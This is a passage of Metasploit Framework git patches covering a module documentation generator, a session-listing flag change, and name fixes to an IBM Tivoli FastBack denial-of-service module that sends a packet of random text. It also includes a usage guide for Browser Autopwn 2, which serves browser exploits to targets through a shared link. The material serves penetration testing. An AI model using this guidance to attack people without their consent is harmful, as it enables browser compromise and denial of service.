commits.empty? + # Possibly the path is wrong. + raise PullRequestFinder::Exception, 'No commits found.' + end + + commits + end + + def get_author(commit) + if commit.author + return commit.author[:login].to_s + end + + '' + end + + def is_author_blacklisted?(commit) + ['tabassassin'].include?(get_author(commit)) + end + + def get_pull_requests_from_commits(commits) + pull_requests = {} + + commits.each do |commit| + next if is_author_blacklisted?(commit) + + pr = get_pull_request_from_commit(commit) + unless pr.empty? + pull_requests[pr[:number]] = pr + end + end + + pull_requests + end + + def get_pull_request_from_commit(commit) + sha = commit.sha + url = URI.parse("https://github.com/#{repository}/branch_commits/#{sha}") + cli = Net::HTTP.new(url.host, url.port) + cli.use_ssl = true + req = Net::HTTP::Get.new(url.request_uri) + res = cli.request(req) + n = Nokogiri::HTML(res.body) + found_pr_link = n.at('li[@class="pull-request"]//a') + + # If there is no PR associated with this commit, it's probably from the SVN days. + return {} unless found_pr_link + + href = found_pr_link.attributes['href'].text + title = found_pr_link.attributes['title'].text + + # Filter out all the pull requests that do not belong to rapid7. + # If this happens, it's probably because the PR was submitted to somebody's fork. + return {} unless /^\/#{owner}\// === href + + { number: href.scan(/\d+$/).flatten.first, title: title } + end + end + + end + end +end \ No newline at end of file From 02834d4251b2c3e318109432d8157f69b9eed927 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Thu, 18 Feb 2016 11:44:14 -0600 Subject: [PATCH 353/686] Add API documentation --- lib/msf/util/document_generator.rb | 13 ++++ lib/msf/util/document_generator/normalizer.rb | 72 ++++++++++++++++++- .../document_generator/pull_request_finder.rb | 53 +++++++++++++- 3 files changed, 136 insertions(+), 2 deletions(-) diff --git a/lib/msf/util/document_generator.rb b/lib/msf/util/document_generator.rb index 641e31ab0b..9c6d66a118 100644 --- a/lib/msf/util/document_generator.rb +++ b/lib/msf/util/document_generator.rb @@ -11,9 +11,16 @@ module Msf module Util module DocumentGenerator + + # Spawns a module document with a browser locally. + # + # @param mod [Msf::Module] Module to create document for. + # @return [void] def self.spawn_module_document(mod) + # By default, if there is a document already in the repository, then open that one. manual_path = File.join(PullRequestFinder::MANUAL_BASE_PATH, "#{mod.fullname}.md") + # No document in the repo, then we generate one on the fly. unless File.exists?(manual_path) md = get_module_document(mod) f = Rex::Quickfile.new(["#{mod.shortname}_doc", '.html']) @@ -25,9 +32,15 @@ module Msf Rex::Compat.open_webrtc_browser("file://#{manual_path}") end + + # Returns a module document in HTML. + # + # @param mod [Msf::Module] Module to create document for. + # @return [void] def self.get_module_document(mod) md = '' + # If there is a document already in the repository, then open that one. manual_path = File.join(PullRequestFinder::MANUAL_BASE_PATH, "#{mod.fullname}.md") if File.exists?(manual_path) diff --git a/lib/msf/util/document_generator/normalizer.rb b/lib/msf/util/document_generator/normalizer.rb index 6fcda0262e..ec20ac06ae 100644 --- a/lib/msf/util/document_generator/normalizer.rb +++ b/lib/msf/util/document_generator/normalizer.rb @@ -28,6 +28,11 @@ module Msf PAYLOAD_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'payload_demo_template.erb')) AUXILIARY_SCANNER_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'auxiliary_scanner_template.erb')) + + # Returns the module document in HTML form. + # + # @param items [Hash] Items to be documented. + # @return [String] HTML. def get_md_content(items) @md_template ||= lambda { template = '' @@ -37,8 +42,13 @@ module Msf md_to_html(ERB.new(@md_template).result(binding())) end + private + + # Returns the CSS code for the HTML document. + # + # @return [String] def load_css @css ||= lambda { data = '' @@ -47,6 +57,11 @@ module Msf }.call end + + # Returns the HTML document. + # + # @param md [String] Markdown document. + # @return [String] HTML document. def md_to_html(md) r = Redcarpet::Markdown.new(Redcarpet::Render::MsfMdHTML, fenced_code_blocks: true) %Q| @@ -63,6 +78,11 @@ module Msf | end + + # Returns the markdown format for pull requests. + # + # @param pull_requests [Hash] Pull requests + # @return [String] def normalize_pull_requests(pull_requests) if pull_requests.kind_of?(PullRequestFinder::Exception) error = Rex::Text.html_encode(pull_requests.message) @@ -78,6 +98,11 @@ module Msf formatted_pr * "\n" end + + # Returns the markdown format for module datastore options. + # + # @param mod_options [Hash] Datastore options + # @return [String] def normalize_options(mod_options) required_options = [] @@ -90,10 +115,21 @@ module Msf required_options * "\n" end + + # Returns the markdown format for module description. + # + # @param description [String] Module description. + # @return [String] def normalize_description(description) Rex::Text.wordwrap(Rex::Text.compress(description)) end + + # Returns the markdown format for module authors. + # + # @param authors [Array] Module Authors + # @param authors [String] Module author + # @return [String] def normalize_authors(authors) if authors.kind_of?(Array) authors.collect { |a| "* #{Rex::Text.html_encode(a)}" } * "\n" @@ -102,14 +138,30 @@ module Msf end end + + # Returns the markdown format for module targets. + # + # @param targets [Array] Module targets. + # @return [String] def normalize_targets(targets) targets.collect { |c| "* #{c.name}" } * "\n" end + + # Returns the markdown format for module references. + # + # @param refs [Array] Module references. + # @return [String] def normalize_references(refs) refs.collect { |r| "* <a href=\"#{r}\">#{r}</a>" } * "\n" end + + # Returns the markdown format for module platforms. + # + # @param platforms [Array] Module platforms. + # @param platforms [String] Module platform. + # @return [String] def normalize_platforms(platforms) if platforms.kind_of?(Array) platforms.collect { |p| "* #{p}" } * "\n" @@ -118,16 +170,34 @@ module Msf end end + + # Returns the markdown format for module rank. + # + # @param rank [String] Module rank. + # @return [String] def normalize_rank(rank) "[#{Msf::RankingName[rank].capitalize}](https://github.com/rapid7/metasploit-framework/wiki/Exploit-Ranking)" end + + # Returns a parsed ERB template. + # + # @param mod [Msf::Module] Metasploit module. + # @param path [String] Template path. + # @return [String] def load_template(mod, path) data = '' File.open(path, 'rb') { |f| data = f.read } ERB.new(data).result(binding()) end + + # Returns a demo template suitable for the module. Currently supported templates: + # BrowserExploitServer modules, HttpServer modules, local exploit modules, post + # modules, payloads, auxiliary scanner modules. + # + # @param mod [Msf::Module] Metasploit module. + # @return [String] def normalize_demo_output(mod) if mod.kind_of?(Msf::Exploit::Remote::BrowserExploitServer) load_template(mod, BES_DEMO_TEMPLATE) @@ -149,4 +219,4 @@ module Msf end end end -end \ No newline at end of file +end diff --git a/lib/msf/util/document_generator/pull_request_finder.rb b/lib/msf/util/document_generator/pull_request_finder.rb index 94ae095a93..ea2ca57367 100644 --- a/lib/msf/util/document_generator/pull_request_finder.rb +++ b/lib/msf/util/document_generator/pull_request_finder.rb @@ -12,12 +12,26 @@ module Msf MANUAL_BASE_PATH = File.expand_path(File.join(Msf::Config.module_directory, '..', 'documentation', 'modules' )) + # @return [Octokit::Client] Git client attr_accessor :git_client + + # @return [String] Metasploit Framework's repository attr_accessor :repository + + # @return [String] Metasploit Framework's branch attr_accessor :branch + + # @return [String] Metasploit Framework's repository owner attr_accessor :owner + + # @return [String] Git access token attr_accessor :git_access_token + + # Initializes Msf::Util::DocumenGenerator::PullRequestFinder + # + # @raise [PullRequestFinder::Exception] No GITHUB_OAUTH_TOKEN environment variable + # @return [void] def initialize unless ENV.has_key?('GITHUB_OAUTH_TOKEN') raise PullRequestFinder::Exception, 'GITHUB_OAUTH_TOKEN environment variable not set.' @@ -30,19 +44,36 @@ module Msf self.git_client = Octokit::Client.new(access_token: git_access_token) end + + # Returns pull requests associated with a particular Metasploit module. + # + # @param mod [Msf::Module] Metasploit module. + # @return [Hash] def search(mod) file_name = get_normalized_module_name(mod) commits = get_commits_from_file(file_name) get_pull_requests_from_commits(commits) end + private + + # Returns the normalized module full name. + # + # @param mod [Msf::Module] Metasploit module. + # @return [String] def get_normalized_module_name(mod) source_fname = mod.method(:initialize).source_location.first source_fname.scan(/(modules.+)/).flatten.first || '' end + + # Returns git commits for a particular file. + # + # @param path [String] File path. + # @raise [PullRequestFinder::Exception] No commits found. + # @return [Array<Sawyer::Resource>] def get_commits_from_file(path) commits = git_client.commits(repository, branch, path: path) if commits.empty? @@ -53,6 +84,11 @@ module Msf commits end + + # Returns the author for the commit. + # + # @param commit [Sawyer::Resource] + # @return [String] def get_author(commit) if commit.author return commit.author[:login].to_s @@ -61,10 +97,20 @@ module Msf '' end + + # Checks whether the author should be skipped or not. + # + # @param commit [Sawyer::Resource] + # @return [Boolean] TrueClass if the author should be skipped, otherwise false. def is_author_blacklisted?(commit) ['tabassassin'].include?(get_author(commit)) end + + # Returns unique pull requests for a collection of commits. + # + # @param commits [Array<Sawyer::Resource>] + # @return [Hash] def get_pull_requests_from_commits(commits) pull_requests = {} @@ -80,6 +126,11 @@ module Msf pull_requests end + + # Returns unique pull requests for a commit. + # + # @param commit [Sawyer::Resource] + # @return [Hash] def get_pull_request_from_commit(commit) sha = commit.sha url = URI.parse("https://github.com/#{repository}/branch_commits/#{sha}") @@ -106,4 +157,4 @@ module Msf end end -end \ No newline at end of file +end From f8d6a59cdc72ffa3bcbe1270276f3fb0a7bdfa22 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Thu, 18 Feb 2016 12:19:25 -0600 Subject: [PATCH 354/686] Change wording --- data/markdown_doc/post_demo_template.erb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/data/markdown_doc/post_demo_template.erb b/data/markdown_doc/post_demo_template.erb index 97a0c6d4b2..20239bbfe6 100644 --- a/data/markdown_doc/post_demo_template.erb +++ b/data/markdown_doc/post_demo_template.erb @@ -1,4 +1,4 @@ -There are two ways to execute a post module. +There are two ways to execute this post module. The first is by using the "run" command at the meterpreter prompt. It allows you to run the post module against that specific session: @@ -19,7 +19,7 @@ msf <%= mod.type %>(<%= mod.shortname %>) > set SESSION session-id msf <%= mod.type %>(<%= mod.shortname %>) > exploit ``` -If you wish to run the post against all sessions, here is how: +If you wish to run the post against all sessions from framework, here is how: 1 - Create the following resource script: From e5ad6fa78163afead464a9f6597689467a8d9900 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Thu, 18 Feb 2016 15:02:24 -0600 Subject: [PATCH 355/686] Support "knowledge base" --- data/markdown_doc/markdown.css | 15 +++++ lib/msf/util/document_generator.rb | 57 ++++++++----------- lib/msf/util/document_generator/normalizer.rb | 28 ++++----- 3 files changed, 51 insertions(+), 49 deletions(-) diff --git a/data/markdown_doc/markdown.css b/data/markdown_doc/markdown.css index 8bad383d05..bd4406fc63 100644 --- a/data/markdown_doc/markdown.css +++ b/data/markdown_doc/markdown.css @@ -116,6 +116,21 @@ pre code { margin:10px auto; } } +#basic_info_button, #knowledge_base_button { + font-family:Arial, sans-serif; + font-size:12px; + padding:10px 5px; + border-style:solid; + border-width:1px; + border-color:#ccc; + color:#333; +} +#basic_info_button:hover, #knowledge_base_button:hover { + cursor: pointer; +} +#knowledge_base { + display: none; +} /* diff --git a/lib/msf/util/document_generator.rb b/lib/msf/util/document_generator.rb index 9c6d66a118..cd17faacfc 100644 --- a/lib/msf/util/document_generator.rb +++ b/lib/msf/util/document_generator.rb @@ -17,19 +17,13 @@ module Msf # @param mod [Msf::Module] Module to create document for. # @return [void] def self.spawn_module_document(mod) - # By default, if there is a document already in the repository, then open that one. - manual_path = File.join(PullRequestFinder::MANUAL_BASE_PATH, "#{mod.fullname}.md") + md = get_module_document(mod) + f = Rex::Quickfile.new(["#{mod.shortname}_doc", '.html']) + f.write(md) + f.close + kb_path = f.path - # No document in the repo, then we generate one on the fly. - unless File.exists?(manual_path) - md = get_module_document(mod) - f = Rex::Quickfile.new(["#{mod.shortname}_doc", '.html']) - f.write(md) - f.close - manual_path = f.path - end - - Rex::Compat.open_webrtc_browser("file://#{manual_path}") + Rex::Compat.open_webrtc_browser("file://#{kb_path}") end @@ -40,21 +34,21 @@ module Msf def self.get_module_document(mod) md = '' - # If there is a document already in the repository, then open that one. - manual_path = File.join(PullRequestFinder::MANUAL_BASE_PATH, "#{mod.fullname}.md") + kb_path = File.join(PullRequestFinder::MANUAL_BASE_PATH, "#{mod.fullname}.md") + kb = '' - if File.exists?(manual_path) - File.open(manual_path, 'rb') { |f| md = f.read } - else - begin - pr_finder = PullRequestFinder.new - pr = pr_finder.search(mod) - rescue PullRequestFinder::Exception => e - # This is a little weird, I guess, because the normalizer must handle two different - # data types. - pr = e - end - n = DocumentNormalizer.new + if File.exists?(kb_path) + File.open(kb_path, 'rb') { |f| kb = f.read } + end + + begin + pr_finder = PullRequestFinder.new + pr = pr_finder.search(mod) + rescue PullRequestFinder::Exception => e + pr = e + end + + n = DocumentNormalizer.new items = { mod_description: mod.description, mod_authors: mod.send(:module_info)['Author'], @@ -66,16 +60,13 @@ module Msf mod_platforms: mod.send(:module_info)['Platform'], mod_options: mod.options, mod_demo: mod - } + } - if mod.respond_to?(:targets) && mod.targets - items[:mod_targets] = mod.targets - end - - md = n.get_md_content(items) + if mod.respond_to?(:targets) && mod.targets + items[:mod_targets] = mod.targets end - md + n.get_md_content(items, kb) end end diff --git a/lib/msf/util/document_generator/normalizer.rb b/lib/msf/util/document_generator/normalizer.rb index ec20ac06ae..df82ad56fd 100644 --- a/lib/msf/util/document_generator/normalizer.rb +++ b/lib/msf/util/document_generator/normalizer.rb @@ -27,19 +27,21 @@ module Msf POST_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'post_demo_template.erb')) PAYLOAD_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'payload_demo_template.erb')) AUXILIARY_SCANNER_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'auxiliary_scanner_template.erb')) + HTML_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'html_template.erb')) # Returns the module document in HTML form. # # @param items [Hash] Items to be documented. + # @param kb [String] Additional information to be added in the doc. # @return [String] HTML. - def get_md_content(items) + def get_md_content(items, kb) @md_template ||= lambda { template = '' File.open(TEMPLATE_PATH, 'rb') { |f| template = f.read } return template }.call - md_to_html(ERB.new(@md_template).result(binding())) + md_to_html(ERB.new(@md_template).result(binding()), kb) end @@ -61,21 +63,15 @@ module Msf # Returns the HTML document. # # @param md [String] Markdown document. + # @param kb [String] Additional information to add. # @return [String] HTML document. - def md_to_html(md) - r = Redcarpet::Markdown.new(Redcarpet::Render::MsfMdHTML, fenced_code_blocks: true) - %Q| - <html> - <head> - <style> - #{load_css} - </style> - </head> - <body> - #{r.render(md)} - </body> - </html> - | + def md_to_html(md, kb) + r = Redcarpet::Markdown.new(Redcarpet::Render::MsfMdHTML, fenced_code_blocks: true) + ERB.new(@html_template ||= lambda { + html_template = '' + File.open(HTML_TEMPLATE, 'rb') { |f| html_template = f.read } + return html_template + }.call).result(binding()) end From adb175136e99a61f2011d2a411f6900620e9ed86 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Thu, 18 Feb 2016 15:14:35 -0600 Subject: [PATCH 356/686] Fix extra whitespace and unused vars in call --- modules/auxiliary/dos/misc/ibm_tsm_dos.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb index f04adddfdf..2a7d55a2ea 100644 --- a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb @@ -12,7 +12,7 @@ class Metasploit4 < Msf::Auxiliary def initialize(info={}) super(update_info(info, - 'Name' => " Server Opcode 0x534 Denial of Service", + 'Name' => "Server Opcode 0x534 Denial of Service", 'Description' => %q{ This module exploits a denial of service condition present in IBM Tivoli Storage Manager FastBack Server when dealing with packets triggering the opcode 0x534 handler. @@ -66,9 +66,9 @@ class Metasploit4 < Msf::Auxiliary print_status("Sending malicious packet") p = tv_pkt(target_opcode, - p1 = "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % [Rex::Text.rand_text_alpha(0x200),0,0,0,0], - p2 = Rex::Text.rand_text_alpha(0x60), - p3 = Rex::Text.rand_text_alpha(0x60) + "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % [Rex::Text.rand_text_alpha(0x200),0,0,0,0], + Rex::Text.rand_text_alpha(0x60), + Rex::Text.rand_text_alpha(0x60) ) sock.put(p) From 3beaeceb0e1a5b6d037e7659b83727475c529577 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Thu, 18 Feb 2016 15:19:39 -0600 Subject: [PATCH 357/686] Special-case bap2 --- lib/msf/util/document_generator/normalizer.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/util/document_generator/normalizer.rb b/lib/msf/util/document_generator/normalizer.rb index df82ad56fd..b041d6df2c 100644 --- a/lib/msf/util/document_generator/normalizer.rb +++ b/lib/msf/util/document_generator/normalizer.rb @@ -195,7 +195,7 @@ module Msf # @param mod [Msf::Module] Metasploit module. # @return [String] def normalize_demo_output(mod) - if mod.kind_of?(Msf::Exploit::Remote::BrowserExploitServer) + if mod.kind_of?(Msf::Exploit::Remote::BrowserExploitServer) && mod.shortname != 'browser_autopwn2' load_template(mod, BES_DEMO_TEMPLATE) elsif mod.kind_of?(Msf::Exploit::Remote::HttpServer) load_template(mod, HTTPSERVER_DEMO_TEMPLATE) From d316609fef3ef1ec68450a275bd78d87ae4c36dc Mon Sep 17 00:00:00 2001 From: Brent Cook <bcook@rapid7.com> Date: Thu, 18 Feb 2016 15:36:43 -0600 Subject: [PATCH 358/686] put extra columns under the -x flag --- lib/msf/base/serializer/readable_text.rb | 6 +++--- lib/msf/ui/console/command_dispatcher/core.rb | 12 ++++++------ 2 files changed, 9 insertions(+), 9 deletions(-) diff --git a/lib/msf/base/serializer/readable_text.rb b/lib/msf/base/serializer/readable_text.rb index b93cd55bc0..ae2cca777a 100644 --- a/lib/msf/base/serializer/readable_text.rb +++ b/lib/msf/base/serializer/readable_text.rb @@ -524,7 +524,7 @@ class ReadableText def self.dump_sessions(framework, opts={}) ids = (opts[:session_ids] || framework.sessions.keys).sort verbose = opts[:verbose] || false - show_checkin = opts[:show_checkin] || false + show_extended = opts[:show_extended] || false indent = opts[:indent] || DefaultIndent col = opts[:col] || DefaultColumnWrap @@ -533,7 +533,7 @@ class ReadableText columns = [] columns << 'Id' columns << 'Type' - columns << 'Checkin?' if show_checkin + columns << 'Checkin?' if show_extended columns << 'Information' columns << 'Connection' @@ -556,7 +556,7 @@ class ReadableText row << session.type.to_s row[-1] << (" " + session.platform) if session.respond_to?(:platform) - if show_checkin + if show_extended if session.respond_to?(:last_checkin) && session.last_checkin row << "#{(Time.now.to_i - session.last_checkin.to_i)}s ago" else diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index d5080f9f40..da0ee05517 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -35,7 +35,6 @@ class Core # Session command options @@sessions_opts = Rex::Parser::Arguments.new( "-c" => [ true, "Run a command on the session given with -i, or all" ], - "-ci" => [ false, "Show the last checkin time in the session table" ], "-h" => [ false, "Help banner" ], "-i" => [ true, "Interact with the supplied session ID " ], "-l" => [ false, "List all active sessions" ], @@ -46,7 +45,8 @@ class Core "-s" => [ true, "Run a script on the session given with -i, or all" ], "-r" => [ false, "Reset the ring buffer for the session given with -i, or all" ], "-u" => [ true, "Upgrade a shell to a meterpreter session on many platforms" ], - "-t" => [ true, "Set a response timeout (default: 15)" ]) + "-t" => [ true, "Set a response timeout (default: 15)" ], + "-x" => [ false, "Show extended information in the session table" ]) @@jobs_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help banner." ], @@ -1760,7 +1760,7 @@ class Core begin method = nil quiet = false - show_checkin = false + show_extended = false verbose = false sid = nil cmds = [] @@ -1781,8 +1781,8 @@ class Core when "-c" method = 'cmd' cmds << val if val - when "-ci" - show_checkin = true + when "-x" + show_extended = true when "-v" verbose = true # Do something with the supplied session identifier instead of @@ -2045,7 +2045,7 @@ class Core end when 'list',nil print_line - print(Serializer::ReadableText.dump_sessions(framework, :show_checkin => show_checkin, :verbose => verbose)) + print(Serializer::ReadableText.dump_sessions(framework, :show_extended => show_extended, :verbose => verbose)) print_line end From 3f3b76bc86a8cb4e0b4230bb06c4bc8488804f82 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Thu, 18 Feb 2016 15:39:38 -0600 Subject: [PATCH 359/686] Add example md for BAP2 --- .../auxiliary/server/browser_autopwn2.md | 164 ++++++++++++++++++ 1 file changed, 164 insertions(+) create mode 100644 documentation/modules/auxiliary/server/browser_autopwn2.md diff --git a/documentation/modules/auxiliary/server/browser_autopwn2.md b/documentation/modules/auxiliary/server/browser_autopwn2.md new file mode 100644 index 0000000000..1c6eda26f3 --- /dev/null +++ b/documentation/modules/auxiliary/server/browser_autopwn2.md @@ -0,0 +1,164 @@ +Browser Autopwn 2 is a complete redesign from the first one, so quite a few things will look and +feel different for you. Here are the features you should know about before using. + +## Exploit URLs + +Normally, the only URL you need to care about is the **BrowserAutoPwn URL**. This is the URL +you should send to the targets you wish to attack. + +For debugging purposes, you can also see each browser exploit's specific URL path. You can do so +by setting the VERBOSE option to true in msfconsole, like this: + +``` +set VERBOSE true +``` + +And then when you run the module, there will be a list showing all the exploits that might be +used, including the URLs. + +## Browser Autopwn 2 Options + +**The HTMLContent Option** + +The HTMLContent option allows you to serve a basic HTML web page to the browser instead of having a +blank one. It supports two syntaxes. + +This example will basically print "Hello world!" on the browser while exploits are tested against +it. + +``` +set HTMLContent Hello world! +``` + +This example will load file /tmp/hello_world.html and that's what the browser will see. Most likely +the second syntax is how you'd want to use the Content option. + +Keep in mind that you should probably try to keep HTMLContent as simple as possible, otherwise +there is a possibility that it might actually influence the reliability of the exploits, especially +the ones that do memory corruption. + +**The EXCLUDE_PATTERN option** + +The EXCLUDE_PATTERN option is used for excluding exploit file names you don't want Browser +Autopwn 2 to use. This is a regex type option, you can be creative about this. + +For example, Adobe Flash exploits in Metasploit tend to have the same file name that begins with: +"adobe_flash_", so to exclude those, you can do: + +``` +set EXCLUDE_PATTERN adobe_flash +``` + +**The INCLUDE_PATTERN option** + +The INCLUDE_PATTERN option is for loading specific exploits that you want Browser Autopwn 2 to use. +Let's reuse the Adobe Flash file name example, if you only want Flash exploits, you can do: + +``` +set INCLUDE_PATTERN adobe_flash +``` + +If you set both INCLUDE_PATTERN and EXCLUDE_PATTERN, the evaluation for INCLUDE_PATTERN will kick +in first, followed by EXCLUDE_PATTERN. + +**The MaxExploitCount option** + +The MaxExploitCount option is for specifying how many exploits you want Browser Autopwn 2 to load. +By default, it's 21. But you can try to bump it up a little bit if you wish to try more exploits. +Note that by doing so you are also allowing more lower ranking modules to kick in, you will have +to figure out the sweet spot for it. An example of setting it: + +``` +set MaxExploitCount 30 +``` + +**The MaxSessionCount option** + +The MaxSessionCount option is for limiting how many sessions to get. It may sound a little odd at +first because why would you want to do that, right? Well, a use case for this is when you don't +actually want to pop shells, instead you just want to know what exploits could be used, this is +something you can try. You can also use this if you don't want your attack to stay open the whole +time: + +``` +set MaxSessionCount 10 +``` + +**The ShowExploitList option** + +The ShowExploitList option means displaying a list of exploits specific to each browser/client. +As we've explained before, when BAP2 loads 21 exploits, probably not all 21 will be served to +the browser, only some of them. In order to see those ones, you need to set this option: + +``` +set ShowExploitList true +``` + +**The AllowedAddresses option** + +The AllowedAddresses option is for attacking a specific range of IPs as a way to avoid penetration +testing accidents. For example, when you send a malicious link to a specific person, that person +may actually share it with his friends, family or other people, and those people aren't your +targets so you shouldn't hit them. Well, Browser Autopwn doesn't know that, so one of the ways to +avoid that is to create a whitelist. + +The option also supports two syntaxes. This is most likely how you will set it: + +``` +set AllowedAddresses file:///tmp/ip_list.txt +``` + +The above will load file ip_list.txt. In that file, one IP per line. + + +**The ExploitReloadTimeout option** + +The ExploitReloadTimeout is for setting how long BAP2 should wait before loading the next exploit. +By default, it's 3 seconds, but in case some exploits need more time (for example, longer time to +groom the heap, load other things, or it's doing a sleep somewhere), you will need to set this. +In most cases, you shouldn't have to. + +Here's an example of setting it to 5 seconds: + +``` +set ExploitReloadTimeout 5000 +``` + +## Application-Specific Testing + +By default, Browser Autopwn 2 goes through the entire exploit module tree, and will try to use +different types of exploits - Firefox, Internet Explorer, Adobe Flash, Android, etc. If you want to +test a specific application, basically all you need to do is setting the +INCLUDE_PATTERN option (or maybe EXCLUDE_PATTERN). + +However, there is another trick to make this task even easier. BAP2 also comes with the following +resource scripts that can automatically do this: + +* bap_firefox_only.rc - For testing Firefox +* bap_flash_only.rc - Fore testing Adobe Flash +* bap_ie_only.rc - For testing Internet Explorer + +Here's an example of using bap_flash_only.rc to test Adobe Flash vulnerabilities: + +``` +$ ./msfconsole -q -r scripts/resource/bap_flash_only.rc +``` + +## Logging + +In addition, when a browser connects to BAP, this link-clicking event is also logged to the +database as a "bap.clicks" note type. If the ShowExploitList option is set to true, that will also +save the exploit list information so that after testing you can go back to the database and see +which users are vulnerable to what exploits. + +Even if you don't set the ShowExploitList option, the logged link-clicking event data is more than +enough to prove that the user was social-engineered, which is still a security risk. + +To see all the bap.clicks events, in msfconsole do: + +``` +notes -t bap.clicks +``` + +From there, you can do additional analysis of these notes, put it on your report, and hopefully +do something about it. From 56c2ba9f75a108cf613c2b416a538f3a6e2e8cfc Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Thu, 18 Feb 2016 15:41:14 -0600 Subject: [PATCH 360/686] Turn the HTML template into external --- data/markdown_doc/html_template.erb | 42 +++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 data/markdown_doc/html_template.erb diff --git a/data/markdown_doc/html_template.erb b/data/markdown_doc/html_template.erb new file mode 100644 index 0000000000..2726efcdd8 --- /dev/null +++ b/data/markdown_doc/html_template.erb @@ -0,0 +1,42 @@ +<html> +<head> +<% unless kb.empty? %> +<script> + function showBasic() { + document.getElementById('knowledge_base').style.display = "none"; + document.getElementById('basic_info').style.display = "inline"; + } + + function showKnowledge() { + document.getElementById('basic_info').style.display = "none"; + document.getElementById('knowledge_base').style.display = "inline"; + } +</script> +<% end %> +<style> +<%= load_css %> +</style> +</head> +<body> +<% unless kb.empty? %> +<table border="0"> +<tr> +<th> +<div id="basic_info_button" onClick="showBasic()">Basic Information</a> +</th> +<th> +<div id="Knowledge_base_button" onClick="showKnowledge()">Knowledge Base</a> +</th> +</tr></table> +<p></p> +<% end %> +<div id="basic_info"> +<%= r.render(md) %> +</div> +<% unless kb.empty? %> +<div id="knowledge_base"> +<%= r.render(kb) %> +<% end %> +</div> +</body> +</html> \ No newline at end of file From a82ce40c401c54e45acdd24364ec6162deefa841 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Wed, 17 Feb 2016 14:33:35 -0600 Subject: [PATCH 361/686] Update ibm_tsm_dos name For some reason I actually modified the name, but I didn't mean to. --- modules/auxiliary/dos/misc/ibm_tsm_dos.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb index 2a7d55a2ea..d04a70f6a0 100644 --- a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb @@ -12,7 +12,7 @@ class Metasploit4 < Msf::Auxiliary def initialize(info={}) super(update_info(info, - 'Name' => "Server Opcode 0x534 Denial of Service", + 'Name' => "IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service", 'Description' => %q{ This module exploits a denial of service condition present in IBM Tivoli Storage Manager FastBack Server when dealing with packets triggering the opcode 0x534 handler. From 4c716a268dfa00f748061a6093c4be9fb63bd0f9 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Thu, 18 Feb 2016 16:11:34 -0600 Subject: [PATCH 362/686] Set some flags --- lib/msf/util/document_generator/normalizer.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/msf/util/document_generator/normalizer.rb b/lib/msf/util/document_generator/normalizer.rb index b041d6df2c..9bc7c8d006 100644 --- a/lib/msf/util/document_generator/normalizer.rb +++ b/lib/msf/util/document_generator/normalizer.rb @@ -66,7 +66,7 @@ module Msf # @param kb [String] Additional information to add. # @return [String] HTML document. def md_to_html(md, kb) - r = Redcarpet::Markdown.new(Redcarpet::Render::MsfMdHTML, fenced_code_blocks: true) + r = Redcarpet::Markdown.new(Redcarpet::Render::MsfMdHTML, fenced_code_blocks: true, no_intra_emphasis: true, escape_html: true) ERB.new(@html_template ||= lambda { html_template = '' File.open(HTML_TEMPLATE, 'rb') { |f| html_template = f.read } @@ -81,7 +81,7 @@ module Msf # @return [String] def normalize_pull_requests(pull_requests) if pull_requests.kind_of?(PullRequestFinder::Exception) - error = Rex::Text.html_encode(pull_requests.message) + error = pull_requests.message return error end @@ -130,7 +130,7 @@ module Msf if authors.kind_of?(Array) authors.collect { |a| "* #{Rex::Text.html_encode(a)}" } * "\n" else - Rex::Text.html_encode(authors) + authors end end From 4fc7008561f38370d6f58d8dd136f4916b350c15 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Thu, 18 Feb 2016 16:12:27 -0600 Subject: [PATCH 363/686] Close div properly --- data/markdown_doc/html_template.erb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/data/markdown_doc/html_template.erb b/data/markdown_doc/html_template.erb index 2726efcdd8..e115d419f4 100644 --- a/data/markdown_doc/html_template.erb +++ b/data/markdown_doc/html_template.erb @@ -36,7 +36,7 @@ <% unless kb.empty? %> <div id="knowledge_base"> <%= 